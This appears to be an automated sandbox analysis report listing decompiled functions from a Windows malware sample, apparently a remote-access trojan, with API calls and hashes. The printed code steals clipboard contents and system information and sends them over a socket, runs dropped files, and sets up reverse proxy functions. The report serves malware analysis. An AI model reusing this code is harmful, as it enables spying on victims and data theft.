                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                • API String ID: 2956720200-749203953
                                                                                                • Opcode ID: 1a1f68142079bd1bee5c8deb1a08623b7a58e4bc293f1c57fec94a65ed8ee932
                                                                                                • Instruction ID: 73570ff1bb1f1cc7f1c06208e28152544e8fd6e892a2dbfdeb0425977fc91e32
                                                                                                • Opcode Fuzzy Hash: 1a1f68142079bd1bee5c8deb1a08623b7a58e4bc293f1c57fec94a65ed8ee932
                                                                                                • Instruction Fuzzy Hash: D841AE716083005BCA14BB76DC4A96F77A9ABC1708F40093EF946A71E1EF789905CB9A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00414719, Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 108filesynchronizationCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 73%
                                                                                                			E00414719(void* __eflags, char _a4, char _a28) {
				char _v28;
				struct _SHELLEXECUTEINFOA _v88;
				char _v112;
				char _v136;
				char _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t33;
				void* _t41;
				intOrPtr _t50;
				signed int _t60;
				char* _t68;
				void* _t73;
				void* _t87;
				void* _t90;

				_t93 = __eflags;
				_t33 = E00402076(_t60,  &_v136, "\\");
				_t86 = E004053F2(_t60,  &_v112, E00437AFA(_t60, __eflags, "Temp"), _t87, _t93, _t33);
				E00402F85(_t60,  &_v28, _t35, _t93,  &_a4);
				E00401FB9();
				_t68 =  &_v136;
				E00401FB9();
				_push(_t68);
				_push(_t68);
				_t41 = E00414956(E0040D58E( &_v316, _t35, _t93, E00401F87( &_v28), 0x10),  &_v316);
				_t94 = _t41;
				if(_t41 == 0) {
					E00402076(_t60, _t90 - 0x18, 0x460734);
					_push(0x6f);
					_t73 = 0x46e8e0;
					goto L6;
				} else {
					_t86 =  &_a28;
					E00414966( &_v316,  &_a28, _t94);
					E0040D53F( &_v316,  &_a28, _t94);
					_v88.hwnd = _v88.hwnd & 0x00000000;
					_v88.lpVerb = _v88.lpVerb & 0x00000000;
					_v88.cbSize = 0x3c;
					_v88.fMask = 0x40;
					_t50 = E00401F87( &_v28);
					asm("movaps xmm0, [0x4671b0]");
					_v88.lpFile = _t50;
					asm("movups [ebp-0x40], xmm0");
					_t60 = _t60 & 0xffffff00 | ShellExecuteExA( &_v88) != 0x00000000;
					_t96 = _v88.hProcess;
					if(_v88.hProcess != 0) {
						E00402076(_t60, _t90, 0x460734);
						_push(0x70);
						E00404BB7(_t60, 0x46e8e0,  &_a28, _t96);
						WaitForSingleObject(_v88.hProcess, 0xffffffff);
						CloseHandle(_v88.hProcess);
						DeleteFileA(E00401F87( &_v28));
					}
					_t97 = _t60 - 1;
					if(_t60 == 1) {
						E00402076(_t60, _t90 - 0x18, 0x460734);
						_push(0x6e);
						_t73 = 0x46e8e0;
						L6:
						E00404BB7(_t60, _t73, _t86, _t97);
					}
				}
				E0040CC8C(_t60,  &_v316, 0x460734);
				E00401FB9();
				E00401FB9();
				return E00401FB9();
			}




















                                                                                                0x00414719
                                                                                                0x00414734
                                                                                                0x00414750
                                                                                                0x00414755
                                                                                                0x0041475e
                                                                                                0x00414763
                                                                                                0x00414769
                                                                                                0x0041476e
                                                                                                0x0041476f
                                                                                                0x0041478c
                                                                                                0x00414791
                                                                                                0x00414793
                                                                                                0x00414854
                                                                                                0x00414859
                                                                                                0x0041485b
                                                                                                0x00000000
                                                                                                0x00414799
                                                                                                0x00414799
                                                                                                0x004147a2
                                                                                                0x004147ad
                                                                                                0x004147b2
                                                                                                0x004147b9
                                                                                                0x004147bd
                                                                                                0x004147c4
                                                                                                0x004147cb
                                                                                                0x004147d0
                                                                                                0x004147d7
                                                                                                0x004147de
                                                                                                0x004147f4
                                                                                                0x004147f7
                                                                                                0x004147fb
                                                                                                0x00414803
                                                                                                0x00414808
                                                                                                0x0041480c
                                                                                                0x00414816
                                                                                                0x0041481f
                                                                                                0x0041482e
                                                                                                0x0041482e
                                                                                                0x00414834
                                                                                                0x00414837
                                                                                                0x0041483f
                                                                                                0x00414844
                                                                                                0x00414846
                                                                                                0x00414860
                                                                                                0x00414860
                                                                                                0x00414860
                                                                                                0x00414837
                                                                                                0x0041486b
                                                                                                0x00414873
                                                                                                0x0041487b
                                                                                                0x0041488e

                                                                                                APIs
                                                                                                  • Part of subcall function 00414966: __EH_prolog.LIBCMT ref: 0041496B
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00460734), ref: 00414816
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0041481F
                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 0041482E
                                                                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004147E2
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
                                                                                                • String ID: <$@$Temp$F$F
                                                                                                • API String ID: 1704390241-1252452680
                                                                                                • Opcode ID: f406f2f5dc46aebd4e3411db8e43c2a3def82ec31058e40fe901cc061d475275
                                                                                                • Instruction ID: 858942575bebabafb25a70dd3938041a6e54752a0859ac0cf24d94d35a2d3125
                                                                                                • Opcode Fuzzy Hash: f406f2f5dc46aebd4e3411db8e43c2a3def82ec31058e40fe901cc061d475275
                                                                                                • Instruction Fuzzy Hash: D241AF319002099BCB14FBA2DC46AEEB778AF50348F40427EF505760E1EF785E89CB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00414091, Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 104sleepfileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 91%
                                                                                                			E00414091(void* __ecx, void* __edi, void* __eflags, char _a4) {
				char _v28;
				char _v52;
				char _v76;
				char _v204;
				void* __ebx;
				void* __esi;
				void* __ebp;
				void* _t35;
				void* _t46;
				void* _t54;
				void* _t55;
				void* _t89;
				void* _t91;

				_t93 = __eflags;
				_t89 = __edi;
				E00403098(_t54,  &_v76, E00404260(_t54,  &_v52, E00437AEF(_t54, __ecx, __eflags, L"temp")), _t89, _t93, L"\\sysinfo.txt");
				E00401EE2();
				_t55 = 0;
				ShellExecuteW(0, L"open", L"dxdiag", E00401EDD(E00409E9E( &_v52, L"/t ", 0,  &_v76)), 0, 0);
				E00401EE2();
				E004020C7(0,  &_v28);
				_t90 = 0;
				do {
					_t35 = E00401EDD( &_v76);
					_t87 =  &_v28;
					E004183CC(_t35,  &_v28);
					Sleep(0x64);
					_t90 = _t90 + 1;
				} while (E00409DEA() != 0 && _t90 < 0x4b0);
				if(E00409DEA() == 0) {
					DeleteFileW(E00401EDD( &_v76));
					E004047EF(1);
					_t46 = E004049DE( &_v204, _t90,  &_v204);
					_t98 = _t46;
					if(_t46 != 0) {
						_t90 = _t91 - 0x18;
						_t16 =  &_a4; // 0x413cef
						_t87 = E00402FA9( &_v52, _t16, 0x46e250);
						E00402F85(_t55, _t91 - 0x18, _t49, _t98,  &_v28);
						_push(0x97);
						E00404BB7(_t55,  &_v204, _t49, _t98);
						E00401FB9();
						E00404F18( &_v204, _t49);
						_t55 = 1;
					}
					E00404FD6(_t55,  &_v204, _t87, _t90);
				}
				E00401FB9();
				E00401EE2();
				E00401FB9();
				return _t55;
			}
















                                                                                                0x00414091
                                                                                                0x00414091
                                                                                                0x004140ba
                                                                                                0x004140c3
                                                                                                0x004140c8
                                                                                                0x004140f1
                                                                                                0x004140fa
                                                                                                0x00414102
                                                                                                0x00414107
                                                                                                0x00414109
                                                                                                0x0041410c
                                                                                                0x00414111
                                                                                                0x00414116
                                                                                                0x0041411d
                                                                                                0x00414126
                                                                                                0x0041412c
                                                                                                0x00414142
                                                                                                0x00414151
                                                                                                0x0041415f
                                                                                                0x0041416b
                                                                                                0x00414170
                                                                                                0x00414172
                                                                                                0x0041417a
                                                                                                0x0041417c
                                                                                                0x0041418e
                                                                                                0x00414192
                                                                                                0x00414198
                                                                                                0x004141a3
                                                                                                0x004141ab
                                                                                                0x004141b6
                                                                                                0x004141bb
                                                                                                0x004141bb
                                                                                                0x004141c3
                                                                                                0x004141c3
                                                                                                0x004141cb
                                                                                                0x004141d3
                                                                                                0x004141db
                                                                                                0x004141e7

                                                                                                APIs
                                                                                                  • Part of subcall function 00409E9E: char_traits.LIBCPMT ref: 00409EAE
                                                                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 004140F1
                                                                                                  • Part of subcall function 004183CC: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,00000000,00000000,?,00404211,004604D4), ref: 004183E9
                                                                                                • Sleep.KERNEL32(00000064), ref: 0041411D
                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 00414151
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CreateDeleteExecuteShellSleepchar_traits
                                                                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp$<A
                                                                                                • API String ID: 2701014334-875816778
                                                                                                • Opcode ID: 1f4c31613ceb57c7a0bbab8a0d43d4546bf6927b26996f6ecc86e74b0424a019
                                                                                                • Instruction ID: 358ac715407f0ab7af5aa6b9de861fc6436c43dce166b1ad661bb97e2f0cc309
                                                                                                • Opcode Fuzzy Hash: 1f4c31613ceb57c7a0bbab8a0d43d4546bf6927b26996f6ecc86e74b0424a019
                                                                                                • Instruction Fuzzy Hash: 57312F719001196ADB04FBA1DC96DEEB778AF50308F40017FF906771D2EE785E8ACA99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00413797, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 49clipboardCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 80%
                                                                                                			E00413797(void* __ebp, char _a16, char _a32, char _a36, void* _a128, void* _a152) {
				void* __ebx;
				void* _t16;
				struct HWND__* _t23;
				void* _t38;
				void* _t41;

				if(OpenClipboard(_t23) != 0) {
					EmptyClipboard();
					CloseClipboard();
					if(OpenClipboard(_t23) != 0) {
						_t38 = GetClipboardData(0xd);
						_t16 = GlobalLock(_t38);
						GlobalUnlock(_t38);
						CloseClipboard();
						_t29 =  !=  ? _t16 : 0x46079c;
						E00404260(_t23,  &_a36,  !=  ? _t16 : 0x46079c);
						_t34 =  &_a32;
						E00417D8C(_t23, _t41 - 0x18,  &_a32);
						_push(0x6b);
						E00404BB7(_t23, 0x46e848,  &_a32, _t16);
						E00401EE2();
					}
				}
				E00401E66( &_a16, _t34);
				E00401FB9();
				E00401FB9();
				return 0;
			}








                                                                                                0x004137a0
                                                                                                0x004137a6
                                                                                                0x004137ac
                                                                                                0x004137bb
                                                                                                0x004137c9
                                                                                                0x004137cc
                                                                                                0x004137d5
                                                                                                0x004137db
                                                                                                0x004137e8
                                                                                                0x004137f0
                                                                                                0x004137f8
                                                                                                0x004137fe
                                                                                                0x00413803
                                                                                                0x0041380a
                                                                                                0x00413bb7
                                                                                                0x00413bb7
                                                                                                0x004137bb
                                                                                                0x00413df2
                                                                                                0x00413dfe
                                                                                                0x00413e0a
                                                                                                0x00413e17

                                                                                                APIs
                                                                                                • OpenClipboard.USER32 ref: 00413798
                                                                                                • EmptyClipboard.USER32 ref: 004137A6
                                                                                                • CloseClipboard.USER32 ref: 004137AC
                                                                                                • OpenClipboard.USER32 ref: 004137B3
                                                                                                • GetClipboardData.USER32 ref: 004137C3
                                                                                                • GlobalLock.KERNEL32 ref: 004137CC
                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004137D5
                                                                                                • CloseClipboard.USER32 ref: 004137DB
                                                                                                  • Part of subcall function 00404BB7: send.WS2_32(?,00000000,00000000,00000000), ref: 00404C2B
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
                                                                                                • String ID: HF
                                                                                                • API String ID: 2172192267-543897734
                                                                                                • Opcode ID: 349c851b95c9bbd21ef230bf255f3fc3199353bd5c417a6aa173b14881e92974
                                                                                                • Instruction ID: 045b0c380979c081de773e9e82938e210c5109a9ad7c78bc6e65a349f7a4d95b
                                                                                                • Opcode Fuzzy Hash: 349c851b95c9bbd21ef230bf255f3fc3199353bd5c417a6aa173b14881e92974
                                                                                                • Instruction Fuzzy Hash: D00125713043009BC314BF72EC59AAE77A5AFD430AF44057FF90A961B2DF38D985865A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00416E36, Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 93%
                                                                                                			E00416E36(char _a4) {
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				int _t22;
				void* _t26;
				void* _t27;

				_t22 = 0;
				_t27 = OpenSCManagerW(0, 0, 0x11);
				_t26 = OpenServiceW(_t27, E00401EDD( &_a4), 0xf003f);
				if(_t26 != 0) {
					if(ControlService(_t26, 1,  &_v32) != 0) {
						do {
							QueryServiceStatus(_t26,  &_v32);
						} while (_v28 != 1);
						StartServiceW(_t26, 0, 0);
						asm("sbb ebx, ebx");
						_t22 = 3;
						CloseServiceHandle(_t27);
						CloseServiceHandle(_t26);
					} else {
						CloseServiceHandle(_t27);
						CloseServiceHandle(_t26);
						_t22 = 2;
					}
				} else {
					CloseServiceHandle(_t27);
				}
				E00401EE2();
				return _t22;
			}








                                                                                                0x00416e41
                                                                                                0x00416e53
                                                                                                0x00416e62
                                                                                                0x00416e66
                                                                                                0x00416e80
                                                                                                0x00416e92
                                                                                                0x00416e97
                                                                                                0x00416e9d
                                                                                                0x00416ea6
                                                                                                0x00416eb5
                                                                                                0x00416eba
                                                                                                0x00416ebd
                                                                                                0x00416ec0
                                                                                                0x00416e82
                                                                                                0x00416e89
                                                                                                0x00416e8c
                                                                                                0x00416e8e
                                                                                                0x00416e8e
                                                                                                0x00416e68
                                                                                                0x00416e69
                                                                                                0x00416e69
                                                                                                0x00416ec5
                                                                                                0x00416ed2

                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,004167DD,00000000), ref: 00416E45
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004167DD,00000000), ref: 00416E5C
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004167DD,00000000), ref: 00416E69
                                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004167DD,00000000), ref: 00416E78
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004167DD,00000000), ref: 00416E89
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004167DD,00000000), ref: 00416E8C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: 4dc9dc2e163de1f8cc17f86928433837f23b5394bd97528844b17ec4833507be
                                                                                                • Instruction ID: 2dec4d0704a19687637dfa5e04a9a48efb7e1956dc458dccc2863434de45f085
                                                                                                • Opcode Fuzzy Hash: 4dc9dc2e163de1f8cc17f86928433837f23b5394bd97528844b17ec4833507be
                                                                                                • Instruction Fuzzy Hash: 401106365003186FC610AF64DC84DFF3B7CDB81B567114126FA05961D1DB68CC86A6E5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00442E74, Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 100%
                                                                                                			E00442E74(char _a4) {
				char _v8;

				_t26 = _a4;
				_t52 =  *_a4;
				if( *_a4 != 0x458280) {
					E004414D5(_t52);
					_t26 = _a4;
				}
				E004414D5( *((intOrPtr*)(_t26 + 0x3c)));
				E004414D5( *((intOrPtr*)(_a4 + 0x30)));
				E004414D5( *((intOrPtr*)(_a4 + 0x34)));
				E004414D5( *((intOrPtr*)(_a4 + 0x38)));
				E004414D5( *((intOrPtr*)(_a4 + 0x28)));
				E004414D5( *((intOrPtr*)(_a4 + 0x2c)));
				E004414D5( *((intOrPtr*)(_a4 + 0x40)));
				E004414D5( *((intOrPtr*)(_a4 + 0x44)));
				E004414D5( *((intOrPtr*)(_a4 + 0x360)));
				_v8 =  &_a4;
				E00442D3A(5,  &_v8);
				_v8 =  &_a4;
				return E00442D8A(4,  &_v8);
			}




                                                                                                0x00442e7a
                                                                                                0x00442e7d
                                                                                                0x00442e85
                                                                                                0x00442e88
                                                                                                0x00442e8d
                                                                                                0x00442e90
                                                                                                0x00442e94
                                                                                                0x00442e9f
                                                                                                0x00442eaa
                                                                                                0x00442eb5
                                                                                                0x00442ec0
                                                                                                0x00442ecb
                                                                                                0x00442ed6
                                                                                                0x00442ee1
                                                                                                0x00442eef
                                                                                                0x00442ef7
                                                                                                0x00442f00
                                                                                                0x00442f08
                                                                                                0x00442f1c

                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00442E88
                                                                                                  • Part of subcall function 004414D5: HeapFree.KERNEL32(00000000,00000000,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?), ref: 004414EB
                                                                                                  • Part of subcall function 004414D5: GetLastError.KERNEL32(?,?,0044A13F,?,00000000,?,00000000,?,0044A3E3,?,00000007,?,?,0044A92E,?,?), ref: 004414FD
                                                                                                • _free.LIBCMT ref: 00442E94
                                                                                                • _free.LIBCMT ref: 00442E9F
                                                                                                • _free.LIBCMT ref: 00442EAA
                                                                                                • _free.LIBCMT ref: 00442EB5
                                                                                                • _free.LIBCMT ref: 00442EC0
                                                                                                • _free.LIBCMT ref: 00442ECB
                                                                                                • _free.LIBCMT ref: 00442ED6
                                                                                                • _free.LIBCMT ref: 00442EE1
                                                                                                • _free.LIBCMT ref: 00442EEF
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp Download File
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 35225a564defa9c04780a4c7497f13dd243867b7e2f47a49cc0cc74fc8bd0c1e
                                                                                                • Instruction ID: 01866ae8dc4f4eaf841c96eccf9e7d6ee302c2bf14fa010b5f2e6fd0ab3cea40
                                                                                                • Opcode Fuzzy Hash: 35225a564defa9c04780a4c7497f13dd243867b7e2f47a49cc0cc74fc8bd0c1e
                                                                                                • Instruction Fuzzy Hash: 0F11437651010CBFDF05EF56C942DD93BB5EF04364F5141AABA088F232DE75DA909B84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0040EEE1, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 191COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 66%
                                                                                                			E0040EEE1(void* __edx, void* __eflags, intOrPtr _a4) {
				char _v32;
				char _v56;
				void* _v60;
				char _v72;
				char _v76;
				char _v80;
				char _v88;
				char _v92;
				void* _v96;
				char _v108;
				char _v112;
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr* _t26;
				char* _t34;
				char* _t37;
				intOrPtr _t50;
				char* _t51;
				char* _t58;
				intOrPtr _t60;
				intOrPtr _t61;
				char* _t65;
				void* _t68;
				intOrPtr _t121;
				void* _t125;
				void* _t128;
				void* _t130;
				void* _t131;
				void* _t133;
				signed int _t135;
				void* _t138;
				void* _t139;
				void* _t140;
				void* _t144;

				_t146 = __eflags;
				_t111 = __edx;
				_push(_t68);
				_t121 = _a4;
				E004020DE(_t68,  &_v76, __edx, __eflags, _t121 + 0xc);
				SetEvent( *(_t121 + 0x24));
				_t26 = E00401F87( &_v80);
				E00404287( &_v80,  &_v56, 4, 0xffffffff);
				_t138 = (_t135 & 0xfffffff8) - 0x3c;
				E004020DE(0x46e250, _t138, _t111, _t146, 0x46e250);
				_t139 = _t138 - 0x18;
				E004020DE(0x46e250, _t139, _t111, _t146,  &_v72);
				E00417E68( &_v112, _t111);
				_t140 = _t139 + 0x30;
				_t125 =  *_t26 - 0x46;
				if(_t125 == 0) {
					E00401E3B( &_v88, _t111, __eflags, 1);
					_t34 = E0040247B();
					E00401F87(E00401E3B( &_v92, _t111, __eflags, 1));
					_t112 = _t34;
					_t37 = E0040F6D9();
					_t127 = _t37;
					__eflags = _t37;
					if(__eflags == 0) {
						_t128 = _t140 - 0x18;
						_push("1");
						L19:
						_t111 = E00402FA9( &_v32, E00401E3B( &_v88, _t112, __eflags, 0), 0x46e250);
						E004076BB(0x46e250, _t128, _t39, _t121, __eflags);
						_push(0x85);
						E00404BB7(0x46e250, _t121, _t39, __eflags);
						E00401FB9();
						L20:
						E00401E66( &_v108, _t111);
						E00401FB9();
						E00401FB9();
						return 0;
					}
					 *0x46dd30 = E0040F96F(_t127, "StartForward");
					 *0x46dd2c = E0040F96F(_t127, "StartReverse");
					 *0x46dd34 = E0040F96F(_t127, "StopForward");
					_t50 = E0040F96F(_t127, "StopReverse");
					_t112 = "GetDirectListeningPort";
					 *0x46dd3c = _t50;
					_t51 = E0040F96F(_t127, "GetDirectListeningPort");
					__eflags =  *0x46dd30;
					 *0x46dd38 = _t51;
					if(__eflags == 0) {
						L17:
						_t128 = _t140 - 0x18;
						_push("2");
						goto L19;
					}
					__eflags =  *0x46dd2c;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags =  *0x46dd34;
					if(__eflags == 0) {
						goto L17;
					}
					__eflags = _t51;
					if(__eflags == 0) {
						goto L17;
					}
					 *0x46dd40 = 1;
					E004020DE(0x46e250, _t140 - 0x18, "GetDirectListeningPort", __eflags, E00401E3B( &_v88, "GetDirectListeningPort", __eflags, 0));
					_push(0x76);
					L10:
					E00404BB7(0x46e250, _t121, _t112, __eflags);
					goto L20;
				}
				_t130 = _t125 - 1;
				if(_t130 == 0) {
					_t58 =  *0x46dd30(E004374E4(_t55, E00401F87(E00401E3B( &_v88, _t111, __eflags, 0))));
					_t144 = _t140 - 0x14;
					L9:
					_t112 = _t58;
					E00417C16(0x46e250, _t144, _t58);
					_push(0x77);
					goto L10;
				}
				_t131 = _t130 - 1;
				if(_t131 == 0) {
					_t60 =  *0x46dacc; // 0x0
					_t61 =  *((intOrPtr*)(_t60 + 0x18));
					__imp__#12( *((intOrPtr*)(_t61 + 4)));
					_t65 =  *0x46dd2c(_t61, E004374E4(_t62, E00401F87(E00401E3B( &_v92, _t111, __eflags, 0))) & 0x0000ffff);
					__eflags = _t65;
					_t109 =  !=  ? 1 :  *0x46dd41 & 0x000000ff;
					 *0x46dd41 =  !=  ? 1 :  *0x46dd41 & 0x000000ff;
					_t112 = _t65;
					E00417C16(0x46e250, _t140 - 0x10, _t65);
					_push(0x78);
					goto L10;
				}
				_t133 = _t131 - 1;
				if(_t133 == 0) {
					_t58 =  *0x46dd34();
					_t144 = _t140 - 0x18;
					goto L9;
				}
				if(_t133 == 1) {
					 *0x46dd3c();
					 *0x46dd41 = 0;
				}
				goto L20;
			}






































                                                                                                0x0040eee1
                                                                                                0x0040eee1
                                                                                                0x0040eeee
                                                                                                0x0040eef1
                                                                                                0x0040eef8
                                                                                                0x0040ef00
                                                                                                0x0040ef0a
                                                                                                0x0040ef1e
                                                                                                0x0040ef23
                                                                                                0x0040ef2e
                                                                                                0x0040ef33
                                                                                                0x0040ef3d
                                                                                                0x0040ef46
                                                                                                0x0040ef4b
                                                                                                0x0040ef4e
                                                                                                0x0040ef51
                                                                                                0x0040f02c
                                                                                                0x0040f033
                                                                                                0x0040f047
                                                                                                0x0040f04c
                                                                                                0x0040f050
                                                                                                0x0040f055
                                                                                                0x0040f057
                                                                                                0x0040f059
                                                                                                0x0040f106
                                                                                                0x0040f108
                                                                                                0x0040f10d
                                                                                                0x0040f125
                                                                                                0x0040f129
                                                                                                0x0040f12f
                                                                                                0x0040f136
                                                                                                0x0040f13f
                                                                                                0x0040f144
                                                                                                0x0040f148
                                                                                                0x0040f151
                                                                                                0x0040f15a
                                                                                                0x0040f167
                                                                                                0x0040f167
                                                                                                0x0040f070
                                                                                                0x0040f081
                                                                                                0x0040f092
                                                                                                0x0040f099
                                                                                                0x0040f09e
                                                                                                0x0040f0a3
                                                                                                0x0040f0aa
                                                                                                0x0040f0af
                                                                                                0x0040f0b6
                                                                                                0x0040f0bb
                                                                                                0x0040f0f7
                                                                                                0x0040f0fa
                                                                                                0x0040f0fc
                                                                                                0x00000000
                                                                                                0x0040f0fc
                                                                                                0x0040f0bd
                                                                                                0x0040f0c4
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040f0c6
                                                                                                0x0040f0cd
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040f0cf
                                                                                                0x0040f0d1
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x0040f0d9
                                                                                                0x0040f0eb
                                                                                                0x0040f0f0
                                                                                                0x0040f01a
                                                                                                0x0040f01c
                                                                                                0x00000000
                                                                                                0x0040f01c
                                                                                                0x0040ef57
                                                                                                0x0040ef5a
                                                                                                0x0040f006
                                                                                                0x0040f00c
                                                                                                0x0040f00f
                                                                                                0x0040f00f
                                                                                                0x0040f013
                                                                                                0x0040f018
                                                                                                0x00000000
                                                                                                0x0040f018
                                                                                                0x0040ef60
                                                                                                0x0040ef63
                                                                                                0x0040ef90
                                                                                                0x0040ef95
                                                                                                0x0040ef9b
                                                                                                0x0040efc1
                                                                                                0x0040efd1
                                                                                                0x0040efd3
                                                                                                0x0040efd9
                                                                                                0x0040efdf
                                                                                                0x0040efe3
                                                                                                0x0040efe8
                                                                                                0x00000000
                                                                                                0x0040efe8
                                                                                                0x0040ef65
                                                                                                0x0040ef68
                                                                                                0x0040ef85
                                                                                                0x0040ef8b
                                                                                                0x00000000
                                                                                                0x0040ef8b
                                                                                                0x0040ef6d
                                                                                                0x0040ef73
                                                                                                0x0040ef79
                                                                                                0x0040ef79
                                                                                                0x00000000

                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp Download File
